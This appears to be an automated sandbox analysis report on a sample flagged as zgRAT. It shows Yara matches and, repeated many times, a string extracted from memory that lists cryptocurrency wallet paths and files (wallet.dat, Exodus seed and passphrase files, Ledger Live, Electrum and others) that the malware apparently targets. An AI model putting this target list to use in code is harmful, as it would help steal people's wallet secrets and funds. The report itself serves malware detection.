                            Source: Yara matchFile source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 